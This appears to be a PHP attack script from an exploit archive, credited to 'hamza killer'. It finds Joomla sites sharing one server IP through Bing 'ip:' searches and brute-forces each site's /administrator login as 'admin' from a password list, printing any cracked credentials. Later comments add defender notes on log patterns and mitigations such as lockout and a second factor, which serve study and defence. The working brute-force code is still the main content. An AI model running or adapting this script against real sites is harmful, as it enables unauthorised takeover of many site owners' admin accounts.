
Joomla Brute Force: All Websites on the Server

Author: hamza killer , Published: 28-03-2014
<?

/*
@hamza killer
to: HawQal Dz - black-id - Top Gastro<3 - Ji Nx - linuxdz
exploit4arab.net
sec4all.org/cc/
sec4ever.com
*/
/*
 * Setup: raise the memory limit, remove the execution time limit, print the
 * banner, then read two operator inputs from STDIN: a server IP address and
 * the path to a password list. Neither input is validated beyond trim().
 */
ini_set('memory_limit', '640M');
// 0 disables PHP's execution time limit, so the run is unbounded.
set_time_limit(0);
echo"
[+]==================================[+]
[+] JOmla Brut force All server [+]
[+] hamza killer [+]
[+] Made in Dz [+]
[+]==================================[+]
";
echo"
[I.Pservers][===>]";
// One line from STDIN (fgets length 1024): the IP whose hosted sites are enumerated later.
$ip=trim(fgets(STDIN,1024));
echo"
[+] passw0rd list =>";
// One line from STDIN: local path of the password list.
$file=trim(fgets(STDIN,1024));
// The whole list is read into memory and split on "\n"; '@' suppresses any warnings.
$ex=@explode("\n",@file_get_contents($file));
// Stop if the split result is falsy.
if(!$ex){
echo"
[-] file not Found";
exit();
}
// Number of entries produced by the split, reported to the operator.
$c=count($ex);
echo"
[+] loaded $c pass";

/*
this function by g-b
*/
/*
 * Main loop. Builds a Bing "ip:" query for the given address combined with
 * "index.php?option=com_", pages through the results ten at a time, and for
 * every <cite> hit and every password-list entry calls token() and login()
 * against http://<hit>/administrator/index.php.
 *
 * Defender notes:
 *  - Target selection is by shared IP, so on shared hosting every indexed
 *    tenant on that address is a candidate. From the hosting side this shows
 *    up as one source requesting /administrator/index.php across many vhosts.
 *  - Each attempt is a GET followed by a POST to /administrator/index.php
 *    over plain http://, always with the username "admin".
 *  - Mitigations that blunt this pattern: no account named "admin", lockout
 *    or rate limiting on the administrator login, a second factor for
 *    back-end accounts, and restricting /administrator by source address.
 */
$dork = urlencode("ip:$ip index.php?option=com_");
// Value returned by pages() is used as the upper bound for the result offset.
$pages = pages($dork);
// Normalised host strings that have already been recorded.
$scanaed = array();
for($i=1;$i<=$pages;$i=$i+10){
// Fetch one search-result page; the return value is not checked.
$src = file_get_contents("http://www.bing.com/search?q=$dork&first=$i");
// Text between <cite> and the first <strong> is taken as the candidate site.
preg_match_all('/<cite>(.*?)<strong>/',$src,$matches);
$sites = $matches[1];
foreach($sites as $site){

foreach($ex as $pass){

/*
This code by g-b ==>
*/
// Dedup key: the hit with every 'www.' and every '/' removed.
$sitet = trim(str_replace('www.','',str_replace('/','',$site)));
// Skip hits that still contain markup ('<') or a query string ('?').
if(eregi('<',$sitet) || eregi('\?',$sitet)) continue;
// Skip when the key is already recorded; otherwise record it.
if(in_array($sitet,$scanaed)) continue;
$scanaed[] = $sitet;
/*
code by g-b fincih <===
tnx to g-b ^_^
*/
// Both calls use the raw $site string, not the normalised $sitet.
$d=token($site);
$f=login($site,$pass,$d);
// login() returned true: print the URL, the fixed username and the password.
if($f){
echo"
\n
[+] Craced \n
[+] http://$site/administrator/index.php : admin : $pass\n";
}
}} }

/**
 * Fetch http://<url>/administrator/index.php and return the name attribute of
 * the first hidden input whose value is "1" (presumably the per-form
 * anti-CSRF token field of the Joomla login form; confirm against the
 * target version).
 *
 * The curl_exec() result and the regex match are not checked, so $token[1]
 * is undefined when the page cannot be fetched or has no such field. The
 * handle is never closed.
 *
 * Defender note: this is a plain GET of the back-end login page, with
 * redirects followed and no CURLOPT_USERAGENT set on the handle.
 *
 * @param string $url Host (and optional path) without scheme.
 * @return string Name of the matched hidden field.
 */
function token($url)
{ $vurl='http://'.$url."/administrator/index.php";
$sh = curl_init();
// Return the body as a string and follow redirects.
curl_setopt($sh,CURLOPT_RETURNTRANSFER,1);
curl_setopt($sh,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($sh,CURLOPT_URL, $vurl);
$exe = curl_exec($sh);
// Capture group 1 is the field name.
preg_match('/<input type="hidden" name="(.*?)" value="1"/', $exe,$token);
return $token[1];
}
/**
 * Submit one login attempt to http://<url>/administrator/index.php and report
 * whether the response contains the text "Logout" (case-insensitive).
 *
 * Setting CURLOPT_POSTFIELDS makes this a POST. The body is fixed apart from
 * the password and the token field name:
 *   username=admin, passwd=<password>, lang=, option=com_login, task=login,
 *   return=aW5kZXgucGhw (base64 of "index.php"), <token>=1
 *
 * Defender notes: the constant username, the constant `return` value and the
 * absence of CURLOPT_USERAGENT on the handle give repeated attempts a stable
 * shape in access and WAF logs. Per-account and per-source throttling on
 * com_login, plus a second factor, defeat password guessing of this kind.
 *
 * @param string $url      Host (and optional path) without scheme.
 * @param string $password Candidate password, interpolated into the body as-is.
 * @param string $token    Hidden field name returned by token().
 * @return bool True when "Logout" appears in the response body.
 */
function login($url,$password,$token)
{ $urlv='http://'.$url.'/administrator/index.php';
$sh = curl_init();
// Return the body as a string and follow redirects.
curl_setopt($sh,CURLOPT_RETURNTRANSFER,1);
curl_setopt($sh,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($sh,CURLOPT_URL, $urlv);
curl_setopt($sh,CURLOPT_POSTFIELDS,"username=admin&passwd=$password&lang=&option=com_login&task=login&return=aW5kZXgucGhw&{$token}=1");
$brute = curl_exec($sh);
// Success heuristic: the word "Logout" anywhere in the returned page.
if(eregi("Logout" , $brute))
{
return true;
}else{
return false;

}
}
/**
 * Ask Bing for the result page starting at offset 199 and scrape the result
 * counter to decide how far the caller should page.
 *
 * The text after the '<span class="sb_count" id="count">' marker is split on
 * '-' and the part before the first '-' is returned (presumably the index of
 * the first result shown on that page; this depends on Bing's markup at the
 * time the script was written). Neither the fetch nor the presence of the
 * marker is checked.
 *
 * @param string $dork URL-encoded search query.
 * @return string Text preceding the first '-' in the counter.
 */
function pages($dork){
$sourc = file_get_contents("http://www.bing.com/search?q=$dork&go=&qs=n&sk=&filt=all&first=199&FORM=PERE3");
// Everything after the counter span's opening tag.
$exop= explode('<span class="sb_count" id="count">',$sourc);
// Keep only the part before the first '-'.
$exop = explode('-',$exop['1']);
return $exop[0];
}
?>
